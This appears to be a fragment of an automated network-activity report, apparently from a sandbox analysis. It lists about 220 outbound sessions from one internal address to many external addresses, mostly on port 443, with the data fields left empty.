                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10795192.168.2.1352278203.199.19.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10796192.168.2.1356946205.103.179.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10797192.168.2.1355374178.185.123.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10798192.168.2.1354284177.240.132.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10799192.168.2.1345844201.149.49.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10800192.168.2.1357230190.13.230.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10801192.168.2.1340858153.87.121.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10802192.168.2.1358908159.20.193.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10803192.168.2.1356474216.103.12.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10804192.168.2.1357188155.182.222.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10805192.168.2.1360692132.254.78.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10806192.168.2.1346526184.52.128.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10807192.168.2.1350616166.36.85.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10808192.168.2.1339886183.27.45.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10809192.168.2.1351678171.54.41.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10810192.168.2.133315249.176.200.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10811192.168.2.1344824208.84.104.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10812192.168.2.1345052190.132.164.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10813192.168.2.134368431.185.210.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10814192.168.2.1343464114.174.144.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10815192.168.2.13584545.141.138.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10816192.168.2.1356252194.119.132.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10817192.168.2.1344436222.90.5.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10818192.168.2.134241032.21.68.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10819192.168.2.135919678.198.100.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10820192.168.2.1344334162.161.178.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10821192.168.2.134280842.193.96.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10822192.168.2.1336128104.222.225.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10823192.168.2.1355352190.191.137.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10824192.168.2.135025496.3.130.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10825192.168.2.1359814185.91.93.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10826192.168.2.1352874188.11.139.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10827192.168.2.135903482.222.160.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10828192.168.2.1335700122.151.77.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10829192.168.2.1337652178.67.131.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10830192.168.2.1333914161.37.25.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10831192.168.2.133375060.240.228.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10832192.168.2.1344770197.199.92.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10833192.168.2.1353220149.5.58.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10834192.168.2.135766096.134.140.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10835192.168.2.1348142201.16.217.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10836192.168.2.1334502172.205.229.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10837192.168.2.134691484.24.46.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10838192.168.2.134557881.83.214.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10839192.168.2.1344394117.246.109.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10840192.168.2.1340194201.179.163.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10841192.168.2.134071417.100.66.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10842192.168.2.1343316110.212.44.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10843192.168.2.134668841.49.163.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10844192.168.2.133533078.145.167.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10845192.168.2.133672076.162.72.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10846192.168.2.133947646.90.156.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10847192.168.2.133860651.16.35.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10848192.168.2.1338152139.212.164.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10849192.168.2.134380895.32.251.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10850192.168.2.13413422.84.142.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10851192.168.2.1355810134.246.251.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10852192.168.2.133728096.161.153.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10853192.168.2.134968070.61.162.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10854192.168.2.134490086.69.204.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10855192.168.2.1347806101.44.32.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10856192.168.2.135595647.9.105.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10857192.168.2.1342996194.46.117.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10858192.168.2.1360816209.145.157.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10859192.168.2.1334900114.149.199.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10860192.168.2.133937088.136.236.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10861192.168.2.1348660213.245.148.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10862192.168.2.13349769.180.124.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10863192.168.2.1340234117.154.48.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10864192.168.2.1360018155.9.43.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10865192.168.2.135582292.76.75.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10866192.168.2.1336252144.214.93.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10867192.168.2.1356170128.75.194.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10868192.168.2.1355138199.24.164.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10869192.168.2.1346152205.193.60.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10870192.168.2.133729273.72.106.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10871192.168.2.134061614.181.24.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10872192.168.2.1342170217.230.60.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10873192.168.2.1338776172.140.64.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10874192.168.2.1334614204.171.178.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10875192.168.2.133697274.161.166.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10876192.168.2.134095085.125.71.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10877192.168.2.1340626129.192.118.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10878192.168.2.1357966111.215.124.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10879192.168.2.1339134104.151.76.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10880192.168.2.1343048177.204.42.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10881192.168.2.1355684204.51.250.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10882192.168.2.1340506156.11.171.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10883192.168.2.1348590199.17.76.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10884192.168.2.1352748128.168.153.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10885192.168.2.1346380122.185.206.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10886192.168.2.1334246141.221.134.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10887192.168.2.135247680.100.12.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10888192.168.2.135825813.85.253.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10889192.168.2.1352282204.135.137.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10890192.168.2.1337504119.250.87.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10891192.168.2.1355804105.51.102.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10892192.168.2.1351430153.0.156.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10893192.168.2.1357650219.104.78.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10894192.168.2.1343238208.8.195.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10895192.168.2.1337326111.145.70.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10896192.168.2.1357520205.195.75.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10897192.168.2.1355916166.179.196.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10898192.168.2.1354162145.197.225.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10899192.168.2.134070671.230.95.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10900192.168.2.13367144.56.64.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10901192.168.2.134337053.147.105.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10902192.168.2.1342260177.157.96.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10903192.168.2.135744285.156.155.348080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10904192.168.2.134847419.204.105.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10905192.168.2.135055059.226.72.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10906192.168.2.1334894121.75.132.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10907192.168.2.136070286.248.209.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10908192.168.2.13486688.141.219.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10909192.168.2.135419050.10.236.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10910192.168.2.1355822176.156.96.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10911192.168.2.133933613.241.3.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10912192.168.2.1360734125.27.15.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10913192.168.2.133932841.38.242.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10914192.168.2.1345378140.11.131.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10915192.168.2.134946837.73.32.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10916192.168.2.1338674145.122.173.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10917192.168.2.1336794140.218.166.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10918192.168.2.134962069.231.114.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10919192.168.2.1353070157.227.33.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10920192.168.2.134944450.190.206.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10921192.168.2.1333730167.11.76.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10922192.168.2.1351738193.233.115.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10923192.168.2.135628697.73.254.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10924192.168.2.1348270132.164.10.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10925192.168.2.135457012.141.207.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10926192.168.2.1360998103.176.83.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10927192.168.2.1345182179.28.62.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10928192.168.2.135325462.119.111.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10929192.168.2.135864653.205.37.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10930192.168.2.1360564146.229.36.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10931192.168.2.1355628172.164.104.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10932192.168.2.1348320165.77.19.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10933192.168.2.134864635.107.58.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10934192.168.2.134544241.234.150.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10935192.168.2.1350254219.179.209.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10936192.168.2.1350300187.230.200.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10937192.168.2.135293063.110.113.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10938192.168.2.1334108166.61.160.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10939192.168.2.135489480.51.5.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10940192.168.2.1336570191.13.147.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10941192.168.2.1348554124.160.166.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10942192.168.2.1346412156.230.252.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10943192.168.2.133746035.187.191.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10944192.168.2.1360650160.87.145.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10945192.168.2.1339528189.45.184.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10946192.168.2.1345318200.209.76.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10947192.168.2.135900874.40.111.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10948192.168.2.1344026181.160.89.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10949192.168.2.134079086.143.21.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10950192.168.2.1351674160.254.225.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10951192.168.2.1339852170.162.236.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10952192.168.2.1338514141.67.239.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10953192.168.2.1352850138.10.71.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10954192.168.2.13476425.63.117.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10955192.168.2.1349860159.104.231.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10956192.168.2.1340870165.28.126.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10957192.168.2.134739066.43.59.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10958192.168.2.135187440.23.242.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10959192.168.2.135178242.48.167.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10960192.168.2.134524844.252.16.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10961192.168.2.1345000188.175.85.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10962192.168.2.134561468.246.79.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10963192.168.2.135930627.224.48.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10964192.168.2.1351730157.196.210.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10965192.168.2.134807213.111.146.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10966192.168.2.1337648125.48.131.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10967192.168.2.1345494139.141.206.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10968192.168.2.1344464219.114.173.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10969192.168.2.1338830167.202.60.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10970192.168.2.1351722102.164.52.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10971192.168.2.134381486.159.247.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10972192.168.2.1356216121.141.183.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10973192.168.2.1338854146.135.4.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10974192.168.2.1358320188.37.121.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10975192.168.2.1332826102.183.33.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10976192.168.2.135609081.137.23.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10977192.168.2.135918085.182.153.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10978192.168.2.13371349.160.66.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10979192.168.2.1338554136.73.35.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10980192.168.2.134808875.74.145.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10981192.168.2.1339256133.127.6.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10982192.168.2.134163675.168.191.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10983192.168.2.134935685.77.98.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10984192.168.2.1360716185.162.72.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10985192.168.2.1335272156.3.59.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10986192.168.2.133942288.66.239.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10987192.168.2.13519664.60.91.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10988192.168.2.134537825.252.231.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10989192.168.2.135756214.44.95.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10990192.168.2.134457439.133.33.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10991192.168.2.1349526209.89.218.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10992192.168.2.1353674103.92.81.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10993192.168.2.134134812.39.87.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10994192.168.2.133590851.109.211.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10995192.168.2.1341288204.129.125.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10996192.168.2.13487541.9.10.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10997192.168.2.13589669.120.34.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10998192.168.2.133308470.255.200.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10999192.168.2.1333572163.128.212.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11000192.168.2.1340218193.175.24.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11001192.168.2.1360684196.4.250.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11002192.168.2.1338540140.151.131.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11003192.168.2.134460666.113.222.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11004192.168.2.134236463.255.3.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11005192.168.2.1357844138.51.138.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11006192.168.2.133904249.115.208.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11007192.168.2.135860614.213.196.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11008192.168.2.1352498108.164.221.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11009192.168.2.1340106223.225.252.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11010192.168.2.135250084.207.33.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11011192.168.2.133866293.190.163.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11012192.168.2.1339840220.159.145.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11013192.168.2.1352124164.121.198.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11014192.168.2.1333862218.95.62.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11015192.168.2.135290657.21.30.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11016192.168.2.1338436101.50.229.22443
